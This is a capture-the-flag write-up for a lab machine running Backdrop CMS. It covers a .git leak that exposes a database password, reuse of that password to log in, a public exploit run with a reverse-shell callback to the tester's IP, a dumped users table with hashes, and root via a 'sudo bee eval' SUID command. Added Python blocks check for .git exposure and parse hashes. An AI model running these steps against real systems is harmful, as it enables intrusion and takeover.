Dog

Pasted image 20250710224843

1. Information gathering

1.1. Port scanning

┌──(root㉿kali)-[~/Desktop/htb/dog]
└─# nmap 10.10.11.58 -p- --min-rate 10000                  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 10:50 EDT
Warning: 10.10.11.58 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.58
Host is up (0.077s latency).
Not shown: 61067 closed tcp ports (reset), 4466 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 15.76 seconds

┌──(root㉿kali)-[~/Desktop/htb/dog]
└─# nmap 10.10.11.58 -p 22,80 -sCV    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 10:57 EDT
Nmap scan report for dog.htb (10.10.11.58)
Host is up (0.077s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds

1.2. Directory scanning

┌──(root㉿kali)-[~/Desktop/htb/dog]
└─# dirsearch -u http://10.10.11.58 -x 403

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/Desktop/htb/dog/reports/http_10.10.11.58/_25-07-12_09-18-43.txt

Target: http://10.10.11.58/

[09:18:43] Starting: 
[09:18:47] 301 -  309B  - /.git  ->  http://10.10.11.58/.git/
[09:18:47] 200 -   95B  - /.git/COMMIT_EDITMSG
[09:18:47] 200 -  604B  - /.git/
[09:18:47] 200 -  409B  - /.git/branches/
[09:18:47] 200 -   92B  - /.git/config
[09:18:47] 200 -   73B  - /.git/description
[09:18:47] 200 -   23B  - /.git/HEAD
[09:18:48] 200 -  650B  - /.git/hooks/
[09:18:48] 200 -  455B  - /.git/info/
[09:18:48] 200 -  240B  - /.git/info/exclude
[09:18:48] 200 -  476B  - /.git/logs/
[09:18:48] 200 -  230B  - /.git/logs/HEAD
[09:18:48] 301 -  325B  - /.git/logs/refs/heads  ->  http://10.10.11.58/.git/logs/refs/heads/
[09:18:48] 200 -  230B  - /.git/logs/refs/heads/master
[09:18:48] 301 -  319B  - /.git/logs/refs  ->  http://10.10.11.58/.git/logs/refs/
[09:18:48] 200 -  461B  - /.git/refs/
[09:18:48] 301 -  320B  - /.git/refs/heads  ->  http://10.10.11.58/.git/refs/heads/
[09:18:48] 200 -   41B  - /.git/refs/heads/master
[09:18:48] 301 -  319B  - /.git/refs/tags  ->  http://10.10.11.58/.git/refs/tags/
[09:18:48] 200 -    2KB - /.git/objects/
[09:18:48] 200 -  337KB - /.git/index
[09:19:04] 301 -  309B  - /core  ->  http://10.10.11.58/core/
[09:19:12] 301 -  310B  - /files  ->  http://10.10.11.58/files/
[09:19:12] 200 -  624B  - /files/
[09:19:14] 200 -    4KB - /index.php
[09:19:14] 404 -    2KB - /index.php/login/
[09:19:15] 200 -  456B  - /layouts/
[09:19:16] 200 -    7KB - /LICENSE.txt
[09:19:18] 301 -  312B  - /modules  ->  http://10.10.11.58/modules/
[09:19:18] 200 -  399B  - /modules/
[09:19:24] 200 -    5KB - /README.md
[09:19:25] 200 -  528B  - /robots.txt
[09:19:26] 200 -    0B  - /settings.php
[09:19:30] 301 -  310B  - /sites  ->  http://10.10.11.58/sites/
[09:19:32] 301 -  311B  - /themes  ->  http://10.10.11.58/themes/
[09:19:32] 200 -  454B  - /themes/

Task Completed

1.3. Git leak

An exposed repository exists at 10.10.11.58:80/.git/.
Dump it with GitHack:

python3 GitHack.py 10.10.11.58:80/.git/

That pulls down the entire Git repository, and there is a lot in it.
The key material is in /settings.php:

# the key lines are the following
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';

This gives the database password: BackDropJ2024DS2024
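A defender-side check for the kind of exposure dirsearch reported above. This is an added example, not part of the write-up or of GitHack: it requests the few .git files that make a repository recoverable and reports which ones are genuinely readable; the fetch function is injectable and the sample responses are constructed, so it runs offline.

```python
"""Defender-side check for an exposed .git directory under a web root.
Added example, not part of the write-up or of GitHack. The probe paths mirror
the ones dirsearch listed above; the fetcher is injectable so the logic can be
exercised offline against constructed responses."""
import urllib.error
import urllib.request

def _is_hex40(s: str) -> bool:
    return len(s) == 40 and set(s) <= set("0123456789abcdef")

# path -> (body validator, what readability of that file means to a defender).
# A CMS may answer 200 with its own HTML for any path, so each body must look
# like the genuine git file; status codes alone are not trusted.
GIT_PROBES = {
    "/.git/HEAD": (lambda b: b.startswith(b"ref: ")
                   or _is_hex40(b.strip().decode(errors="replace")),
                   "repository present"),
    "/.git/config": (lambda b: b"[core]" in b, "branch/remote layout readable"),
    "/.git/index": (lambda b: b.startswith(b"DIRC"),
                    "tracked-file list with blob ids readable; full dump possible"),
    "/.git/logs/HEAD": (lambda b: _is_hex40(b.split(b" ", 1)[0].decode(errors="replace")),
                        "history with committer names and emails readable"),
}

def http_fetch(url: str, timeout: float = 5.0):
    """Real fetcher: GET url and return the body, or None on any error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (urllib.error.URLError, OSError):
        return None

def check_git_exposure(base_url: str, fetch=http_fetch) -> dict:
    """Return {path: meaning} for every probe whose body is a genuine git file."""
    base = base_url.rstrip("/")
    return {path: meaning for path, (valid, meaning) in GIT_PROBES.items()
            if (body := fetch(base + path)) is not None and valid(body)}

# Constructed responses standing in for a live host (not the real target).
FAKE_SITE = {
    "http://example.test/.git/HEAD": b"ref: refs/heads/master\n",
    "http://example.test/.git/config": b"[core]\n\trepositoryformatversion = 0\n",
    "http://example.test/.git/index": b"DIRC\x00\x00\x00\x02\x00\x00\x00\x05",
    "http://example.test/.git/logs/HEAD": b"<html>Not found</html>",
}

def fake_fetch(url: str):
    return FAKE_SITE.get(url)

if __name__ == "__main__":
    for path, meaning in check_git_exposure("http://example.test", fake_fetch).items():
        print(f"{path}: {meaning}")
```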

1.4. Web

Pasted image 20250712225531
The site has a login page but no registration button; I tried a few weak passwords at random without success.

Earlier I obtained the database password, which is very likely also the password of some site user, so I kept looking for a username, checking whether the .git dump holds any user-related information.

Since an email address can be used as the username, I only need to search the whole dump for the mail domain.

Grepping for @dog.htb, I found one user email: tiffany@dog.htb

┌──(root㉿kali)-[~/…/htb/dog/GitHack/10.10.11.58]
└─# grep -r  '@dog.htb' 
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"

Logging in with tiffany@dog.htb / BackDropJ2024DS2024 succeeds.

Pasted image 20250712231123
The browser plugin also identified the CMS for me as Backdrop.

Look for a matching vulnerability:
Pasted image 20250712231318

git clone https://github.com/ajdumanhug/CVE-2022-42092

python3 CVE-2022-42092.py http://10.10.11.58 'tiffany@dog.htb' 'BackDropJ2024DS2024' 10.10.14.94 4321

Pasted image 20250712231834

1.5. Database

Once in, look at the database:

mysql> select * from users;
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| uid | name              | pass                                                    | mail                       | signature | signature_format | created    | changed    | access     | login      | status | timezone | language | picture | init                       | data       |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
|   0 |                   |                                                         |                            |           | NULL             |          0 |          0 |          0 |          0 |      0 | NULL     |          |       0 |                            | NULL       |
|   1 | jPAdminB          | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@dog.htb           |           | NULL             | 1720548614 | 1720584122 | 1720714603 | 1720584166 |      1 | UTC      |          |       0 | jPAdminB@dog.htb           | 0x623A303B |
|   2 | jobert            | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@dog.htb             |           | NULL             | 1720584462 | 1720584462 | 1720632982 | 1720632780 |      1 | UTC      |          |       0 | jobert@dog.htb             | NULL       |
|   3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@dog.htb |           | NULL             | 1720632880 | 1720632880 | 1723752097 | 1723751569 |      1 | UTC      |          |       0 | dogBackDroopSystem@dog.htb | NULL       |
|   5 | john              | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@dog.htb               |           | NULL             | 1720632910 | 1720632910 |          0 |          0 |      1 | UTC      |          |       0 | john@dog.htb               | NULL       |
|   6 | morris            | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@dog.htb             |           | NULL             | 1720632931 | 1720632931 |          0 |          0 |      1 | UTC      |          |       0 | morris@dog.htb             | NULL       |
|   7 | axel              | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@dog.htb               |           | NULL             | 1720632952 | 1720632952 |          0 |          0 |      1 | UTC      |          |       0 | axel@dog.htb               | NULL       |
|   8 | rosa              | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | rosa@dog.htb               |           | NULL             | 1720632982 | 1720632982 |          0 |          0 |      1 | UTC      |          |       0 | rosa@dog.htb               | NULL       |
|  10 | tiffany           | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@dog.htb            |           | NULL             | 1723752136 | 1723752136 | 1752332047 | 1752332065 |      1 | UTC      |          |       0 | tiffany@dog.htb            | NULL       |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+

There are quite a few users.
Try to identify the hash type:

┌──(root㉿kali)-[~/Desktop/htb/dog/CVE-2022-42092]
└─# hash-identifier $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v

 Not Found.

None of them can be identified. I figure hashes like these most likely cannot be brute-forced either.
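hash-identifier simply has no signature for this format: the $S$E... strings are the phpass-derived SHA-512 scheme that Backdrop inherited from Drupal 7. The block below is an added example, not code from the write-up or from Backdrop itself; it re-implements that scheme to parse a dumped hash and to verify a password against a stored one, which also shows why the 2^16 iterations encoded by the 'E' make guessing expensive.

```python
"""Backdrop CMS "$S$" password hashes: parse and verify.
Added example, not code from the write-up or from Backdrop. It re-implements
the phpass-derived SHA-512 scheme Backdrop inherited from Drupal 7, which
hash-identifier has no signature for: "$S$" + one char giving log2 of the
iteration count + 8-char salt + 43 chars of phpass base64 (55 chars total)."""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # stored hashes are cut to this length

def _b64(data: bytes) -> str:
    """phpass base64 (not RFC 4648): each 3-byte group is read little-endian
    and emitted as four 6-bit chars, low bits first; a short tail gives fewer."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for shift in range(0, 6 * (len(chunk) + 1), 6):
            out.append(ITOA64[(value >> shift) & 0x3F])
    return "".join(out)

def parse(stored: str) -> dict:
    """Iteration count and salt from the 12-char "$S$" + count + salt prefix."""
    if len(stored) < 12 or not stored.startswith("$S$"):
        raise ValueError("not a Backdrop/Drupal 7 $S$ hash")
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count outside the allowed 2^7..2^30")
    return {"iterations": 1 << count_log2, "salt": stored[4:12]}

def _crypt(password: str, setting: str) -> str:
    """Drupal/Backdrop _password_crypt() for sha512: salted, then iterated."""
    p, pw = parse(setting), password.encode()
    h = hashlib.sha512(p["salt"].encode() + pw).digest()
    for _ in range(p["iterations"]):
        h = hashlib.sha512(h + pw).digest()
    return (setting[:12] + _b64(h))[:HASH_LENGTH]

def hash_password(password: str, salt: str = "", count_log2: int = 16) -> str:
    """New hash; count_log2=16 is what the 'E' in the dumped hashes encodes."""
    return _crypt(password, "$S$" + ITOA64[count_log2] + (salt or _b64(os.urandom(6))))

def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    try:
        return hmac.compare_digest(_crypt(password, stored), stored)
    except ValueError:
        return False
```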

First, list the users on the box:

www-data@dog:/home$ ls
jobert  johncusack

Try switching user with the database password:

www-data@dog:/home$ su johncusack
Password: BackDropJ2024DS202 
johncusack@dog:/home$ whoami
johncusack

The johncusack user's password turns out to be the same as the database password.

2. Privilege escalation via bee

johncusack@dog:~$ sudo -l
[sudo] password for johncusack: BackDropJ2024DS202 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

bee is a command-line tool for managing Backdrop CMS. It lets you carry out a wide range of tasks from the shell, including configuration management, database operations, project (module/theme) management and user management.

Build the command from the usage documentation:
Usage · backdrop-contrib/bee Wiki · GitHub

johncusack@dog:~$ sudo  /usr/local/bin/bee --root=/var/www/html eval 'system("chmod +s /bin/bash");'
johncusack@dog:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash

Pasted image 20250712234104